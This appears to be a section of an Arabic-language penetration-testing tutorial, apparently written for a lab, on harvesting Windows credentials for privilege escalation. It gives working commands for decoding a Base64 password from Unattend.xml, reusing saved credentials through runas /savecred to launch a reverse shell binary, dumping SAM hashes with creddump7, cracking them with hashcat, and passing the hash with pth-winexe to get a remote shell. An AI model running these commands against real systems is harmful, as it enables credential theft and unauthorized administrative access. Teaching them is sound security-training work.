Passwords

Configuration Files

في بعض الاحيان ممكن تلاقون ملف اسمه Unattend.xml هذا الملف تتخزن فيه اعدادات النظام وممكن تلاقون فيه password مخزن على شكل Base64. في المثال التالي الملف موجود في C:\Windows\Panther\Unattend.xml نقدر نقرأ الملف:

ننسخ الملف للكالي ونقدر نشوف داخل ال password section فيه string عبارة عن base64:

ننسخ ال string ونسوي له decode:

echo "cGFzc3dvcmQxMjM=" | base64 -d

تقدر بعدين تستخم ال password فيه ssh, RDP واكثر.

Saved Credentials

نقدر نستخدم cmdkey ونستخرج ال saved passwords :

cmdkey /list

نقدر الان نستغلهم ونشغل اي ملف عن طريق ال admin:

runas /savecred /user:admin C:\reverse.exe

Security Account Manager (SAM)

ملف ال SAM هو عبارة عن ملف يتخزن فيه ال passwords, usernames وتتخزن ال passwords على شكل NTLM Hash. في المثال هذا فيه backup لل SAM و ال SYSTEM فايل. طبعاً رح نحتاج الملفين عشان نسوي dump لل hashes , ننسخ الملفين للكالي. فيه tool اسمها creddump7 موجودة ب github:

git clone https://github.com/Neohapsis/creddump7.git
python2 creddump7/pwdump.py SYSTEM SAM

نقدر نسوي crack لل NT Hash عن طريق hashcat:

hashcat -m 1000 --force 'a9fdfa038c4b75ebc76dc855dd74f0da' /usr/share/wordlists/rockyou.txt

Passing the Hash

طيب لو ما نقدر نسوي crack لل password ايش ممكن نسوي؟ نقدر نستخم ال full hash وناخذ shell عن طريق مثلاً pth-winexe:

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.224.34 cmd.exe

Registry

نقدر نبحث في ال Registry عن كلمة password او key وغيرها:

reg query HKLM /f password /t REG_SZ /s

رح تكون العملية صعبة جداً أذا رح نسويها بنفسنا. نقدر نستخدم winPEAS والي عن طريقها رح تسوي بحث اسرع هذه صورة كمثال: